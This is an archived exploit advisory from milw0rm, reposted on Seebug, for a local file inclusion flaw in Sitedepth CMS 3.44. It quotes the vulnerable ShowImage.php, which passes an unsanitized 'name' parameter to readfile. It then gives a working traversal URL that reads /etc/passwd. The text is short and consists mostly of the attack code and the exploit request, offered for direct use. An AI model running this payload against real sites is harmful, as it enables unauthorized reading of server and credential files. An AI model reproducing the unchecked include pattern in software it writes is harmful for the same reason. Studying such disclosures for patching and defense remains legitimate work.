__________________________________________________________________________ [*] Sitedepth CMS 3.44 Local File Include LFI Exploit __________________________________________________________________________ [!] Application homepage : http://www.sitedepth.com/ [!] Author : H4 / Team XPK [!] Contact : H4_XPK@hotmail.com [!] Bug discovered : 2006-11-07 [!] Bug published : 2007-06-25 --------------------------------------------------------------------- Vuln. code: ShowImage.php <?php include 'sitedepth.php'; $content_type = 'image/jpeg'; $filename = SD_DIRS_REPOS . '/html/' . $_GET['name']; $filename_show = $_GET['name']; header ('Content-type: ' . $content_type); header ('Content-Disposition: inline; filename=' . $filename_show); readfile ($filename); <-------------- BAD! ?> --------------------------------------------------------------------- [!] Exploitation : http://noobie.com/sitedepth/ShowImage.php?name=../../../../../../../../etc/passwd --------------------------------------------------------------------- [!] Sometimes it`s time to give instead of taking :) [!] Greetz to Angeldust & Streets and to rest of community. # milw0rm.com [2007-06-25]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论